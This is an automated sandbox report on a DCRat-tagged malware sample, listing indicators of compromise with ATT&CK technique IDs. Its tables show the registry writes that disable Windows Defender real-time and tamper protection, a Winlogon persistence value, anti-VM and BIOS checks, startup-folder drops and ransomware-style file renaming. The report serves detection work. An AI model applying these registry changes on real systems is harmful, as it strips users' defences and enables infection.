dcrat | 15443c40e026f2aed7f025261a8e3a0d25ac8b2160df15f8cf40206c80eca148

Processes:

RFQ2.exeRFQ2.exepoxuipluspoxui.exeRFQ2.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,\"C:\\Users\\Admin\\AppData\\Local\\chrome.ex.exe\","	RFQ2.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,\"C:\\Users\\Admin\\AppData\\Local\\chrome.ex.exe\","	RFQ2.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,\"C:\\Users\\Admin\\AppData\\Local\\chrome.ex.exe\","	poxuipluspoxui.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,\"C:\\Users\\Admin\\AppData\\Local\\chrome.ex.exe\","	RFQ2.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 64 IoCs

evasion trojan

Modify Registry

Modify Existing Service

T1031

Disabling Security Tools

T1089

Processes:

WerFault.execor7640.exechrome.exejr866572.exew43kj59.exeConhost.exemsedge.exenig1r21312312.exev4630nF.exetz9517.exeWerFault.exevbc.exetz9517.exebus6396.exeCrack.execor7640.exejr866572.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	WerFault.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	cor7640.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	chrome.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	chrome.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	jr866572.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	w43kj59.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	Conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	msedge.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	msedge.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	WerFault.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	chrome.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	nig1r21312312.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	v4630nF.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	tz9517.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	WerFault.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	vbc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	vbc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	chrome.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	vbc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	tz9517.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	bus6396.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	tz9517.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	Crack.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	msedge.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	cor7640.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	cor7640.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	cor7640.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	Crack.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	WerFault.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	jr866572.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	w43kj59.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	bus6396.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	WerFault.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	w43kj59.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	Conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	Conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	v4630nF.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	v4630nF.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	msedge.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	WerFault.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	jr866572.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	cor7640.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	nig1r21312312.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	w43kj59.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	Crack.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	msedge.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	jr866572.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	w43kj59.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	bus6396.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	bus6396.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	jr866572.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	nig1r21312312.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	Conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	tz9517.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	tz9517.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	cor7640.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	jr866572.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	v4630nF.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	v4630nF.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	tz9517.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	WerFault.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	cor7640.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	vbc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	WerFault.exe

Process spawned unexpected child process 6 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rundll32.exerundll32.exerundll32.exerundll32.exerundll32.exerundll32.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3668	4468	rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1984	4468	rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6704	4468	rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	9152	8556	rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	8860	8236	rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7848	9684	rundll32.exe

Raccoon
Raccoon is an infostealer written in C++ and first seen in 2019.
stealer raccoon
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader

DCRat payload 2 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
behavioral3/memory/3404-7854-0x0000000000500000-0x00000000005CE000-memory.dmp	dcrat
behavioral3/memory/2284-7953-0x0000000000400000-0x00000000004CE000-memory.dmp	dcrat

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs

evasion

Query Registry

Virtualization/Sandbox Evasion

T1497

Processes:

legenda.exesshDesktop-type0.8.0.3.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	legenda.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	sshDesktop-type0.8.0.3.exe

Blocklisted process makes network request 10 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

flow	pid	process
625	1404	powershell.exe
630	1404	powershell.exe
755	5416	powershell.exe
759	5416	powershell.exe
850	5436	powershell.exe
851	5436	powershell.exe
1257	9680	powershell.exe
1259	9680	powershell.exe
1396	7812	powershell.exe
1397	7812	powershell.exe

Downloads MZ/PE file

Modifies extensions of user files 5 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

stpoeoeiej.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\PingClose.crw => C:\Users\Admin\Pictures\PingClose.crw.tycx	stpoeoeiej.exe
File renamed	C:\Users\Admin\Pictures\SplitStop.png => C:\Users\Admin\Pictures\SplitStop.png.tycx	stpoeoeiej.exe
File renamed	C:\Users\Admin\Pictures\WaitExpand.crw => C:\Users\Admin\Pictures\WaitExpand.crw.tycx	stpoeoeiej.exe
File renamed	C:\Users\Admin\Pictures\ApproveWatch.crw => C:\Users\Admin\Pictures\ApproveWatch.crw.tycx	stpoeoeiej.exe
File renamed	C:\Users\Admin\Pictures\ConvertFromUse.raw => C:\Users\Admin\Pictures\ConvertFromUse.raw.tycx	stpoeoeiej.exe

.NET Reactor proctector 2 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\RarSFX0\brg.exe	net_reactor
behavioral3/memory/3852-7825-0x0000027A527D0000-0x0000027A528BC000-memory.dmp	net_reactor

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

legenda.exesshDesktop-type0.8.0.3.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	legenda.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	legenda.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	sshDesktop-type0.8.0.3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	sshDesktop-type0.8.0.3.exe

Checks computer location settings 2 TTPs 41 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

Processes:

RFQ2.exefile.exeolov.exelegenda.exestpoeoeiej.exe76feee748612466fbd3f219b1adae8b4 (3).exeRFQ2.exelower.exe76feee748612466fbd3f219b1adae8b4 (3).exe76feee748612466fbd3f219b1adae8b4 (3).exe76feee748612466fbd3f219b1adae8b4 (3).exeCrack.exesqlcmd.exepoxuipluspoxui.exeCrack.exe76feee748612466fbd3f219b1adae8b4 (3).exesqlcmd.exesqlcmd.exelower.exesetup.exesetup.exeCrack.exesqlcmd.exeCrack.exesetup.exey69TC67.exesetup.exe76feee748612466fbd3f219b1adae8b4 (3).exestpoeoeiej.exebuild2.exesetup.exeCrack.exege386417.exestpoeoeiej.exesqlcmd.exemetafor.exeRFQ2.exesetup.exesetup.exelegenda.exelower.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	RFQ2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	file.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	olov.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	legenda.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	stpoeoeiej.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	76feee748612466fbd3f219b1adae8b4 (3).exe
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	RFQ2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	lower.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	76feee748612466fbd3f219b1adae8b4 (3).exe
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	76feee748612466fbd3f219b1adae8b4 (3).exe
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	76feee748612466fbd3f219b1adae8b4 (3).exe
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	Crack.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	sqlcmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	poxuipluspoxui.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	Crack.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	76feee748612466fbd3f219b1adae8b4 (3).exe
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	sqlcmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	sqlcmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	lower.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	setup.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	setup.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	Crack.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	sqlcmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	Crack.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	setup.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	y69TC67.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	setup.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	76feee748612466fbd3f219b1adae8b4 (3).exe
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	stpoeoeiej.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	build2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	setup.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	Crack.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	ge386417.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	stpoeoeiej.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	sqlcmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	metafor.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	RFQ2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	setup.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	setup.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	legenda.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	lower.exe

Drops startup file 6 IoCs

Processes:

3182.tmp.exe6BF6.tmp.exevbc.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SLKnqzyCzgZJpxyV8.exe	3182.tmp.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\O1cQnsO2xuQVI57Os.exe	6BF6.tmp.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\O1cQnsO2xuQVI57Os.exe	6BF6.tmp.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\poxuipluspoxui.exe	vbc.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\poxuipluspoxui.exe	vbc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SLKnqzyCzgZJpxyV8.exe	3182.tmp.exe

Executes dropped EXE 64 IoCs

Processes:

RFQ2.exeFvryllwsales.exew43kj59.exe76feee748612466fbd3f219b1adae8b4 (2).exezap7751.exezap9196.exezap9710.exetz9517.exe76feee748612466fbd3f219b1adae8b4 (2)2.exezitV0071.exeCrack.exe76feee748612466fbd3f219b1adae8b4 (3).exeCrack.exeInstallUtil.exekino6747.exeCrack.execmd.exekino5694.exebrg.exemsedge.exesqlcmd.exeEBZfayui1.exe3182.tmp.exeWerFault.exefb94349c162808651fb84b58e6881eb0.exeKiffAppE2.exeku834241.exefile.exesetup.execor7640.exeolov.exeWerFault.exew43kj59.exeBt8oAAf.exeRFQ2.exeSetuр.exesetup.exeOlovWPF.exege386417.exeSetuр.exemsedge.exe76feee748612466fbd3f219b1adae8b4 (1).exe76feee748612466fbd3f219b1adae8b4 (1).exeWerFault.exeWerFault.exe76feee748612466fbd3f219b1adae8b4 (2)2.exeWerFault.exeWerFault.exeWerFault.exege386417.exe76feee748612466fbd3f219b1adae8b4 (3).exejr866572.exeCrack.exechrome.exechrome.exeku834241.exesqlcmd.exe6BF6.tmp.exeKiffAppE2.exelower.exe

pid	process
4304	RFQ2.exe
1336	Fvryllwsales.exe
4024	w43kj59.exe
1112	76feee748612466fbd3f219b1adae8b4 (2).exe
860	zap7751.exe
2384	zap9196.exe
1492	zap9710.exe
4348	tz9517.exe
4496	76feee748612466fbd3f219b1adae8b4 (2)2.exe
1264	zitV0071.exe
2112	Crack.exe
1960	76feee748612466fbd3f219b1adae8b4 (3).exe
2928	Crack.exe
2948	InstallUtil.exe
412	kino6747.exe
1208	Crack.exe
4940	cmd.exe
380	kino5694.exe
3852	brg.exe
4804	msedge.exe
952	sqlcmd.exe
4268	EBZfayui1.exe
3568	3182.tmp.exe
4696
4104	WerFault.exe
3420	fb94349c162808651fb84b58e6881eb0.exe
3248
1472	KiffAppE2.exe
1416	ku834241.exe
2420	file.exe
464	setup.exe
2184	cor7640.exe
2824	olov.exe
776	WerFault.exe
5508	w43kj59.exe
5528	Bt8oAAf.exe
6060	RFQ2.exe
5292	Setuр.exe
5376	setup.exe
4024	OlovWPF.exe
4808	ge386417.exe
5704	Setuр.exe
5128	msedge.exe
5952	76feee748612466fbd3f219b1adae8b4 (1).exe
908	76feee748612466fbd3f219b1adae8b4 (1).exe
5356	WerFault.exe
2376	WerFault.exe
1380	76feee748612466fbd3f219b1adae8b4 (2)2.exe
1552	WerFault.exe
3900	WerFault.exe
4876	WerFault.exe
3648	ge386417.exe
5600	76feee748612466fbd3f219b1adae8b4 (3).exe
4548	jr866572.exe
2388	Crack.exe
2112	Crack.exe
4864	chrome.exe
5612	chrome.exe
5136	ku834241.exe
5516	sqlcmd.exe
6108	6BF6.tmp.exe
5408	KiffAppE2.exe
5784	lower.exe
4104	WerFault.exe

Loads dropped DLL 39 IoCs

Processes:

rundll32.exesetup.exeaspnet_wp.exerundll32.exeWerFault.exeAddInProcess32.exerundll32.exebuild2.exeConhost.exeis-I05L8.tmpis-VHBPS.tmpis-SC6PG.tmpis-S657C.tmpis-KOI1L.tmpis-LQG72.tmpis-OOJDL.tmpis-F3DI9.tmpis-MF08M.tmpis-KBELP.tmpis-Q3K08.tmpis-H0G9H.tmpis-ABQD5.tmprundll32.exeis-B6NHC.tmpjsc.exerundll32.exeAddInProcess32.exeis-K8DJL.tmprundll32.exe

pid	process
4424	rundll32.exe
464	setup.exe
1384	aspnet_wp.exe
1384	aspnet_wp.exe
1384	aspnet_wp.exe
5276	rundll32.exe
1384	aspnet_wp.exe
6760	WerFault.exe
3288	AddInProcess32.exe
3288	AddInProcess32.exe
3288	AddInProcess32.exe
6272	rundll32.exe
5460	build2.exe
5460	build2.exe
6008	Conhost.exe
4688	is-I05L8.tmp
7096	is-VHBPS.tmp
6492	is-SC6PG.tmp
6104	is-S657C.tmp
6296	is-KOI1L.tmp
1716	is-LQG72.tmp
412	is-OOJDL.tmp
7732	is-F3DI9.tmp
3996	is-MF08M.tmp
8000	is-KBELP.tmp
7256	is-Q3K08.tmp
6448	is-H0G9H.tmp
7648	is-ABQD5.tmp
8832	rundll32.exe
5980	is-B6NHC.tmp
1084	jsc.exe
1084	jsc.exe
1084	jsc.exe
5760	rundll32.exe
10056	AddInProcess32.exe
10056	AddInProcess32.exe
10056	AddInProcess32.exe
9120	is-K8DJL.tmp
6324	rundll32.exe

Modifies file permissions 1 TTPs 4 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exe

pid process

1892 icacls.exe
1540 icacls.exe
1788 icacls.exe
2060 icacls.exe
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
1892	icacls.exe
1540	icacls.exe
1788	icacls.exe
2060	icacls.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\ProgramData\sshDesktop-type0.8.0.3\sshDesktop-type0.8.0.3.exe	upx
C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe	upx

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Windows security modification 2 TTPs 11 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

Processes:

cor7640.exejr866572.exenig1r21312312.exetz9517.exev4630nF.exetz9517.exeCrack.exebus6396.execor7640.exejr866572.exew43kj59.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	cor7640.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0"	jr866572.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	nig1r21312312.exe
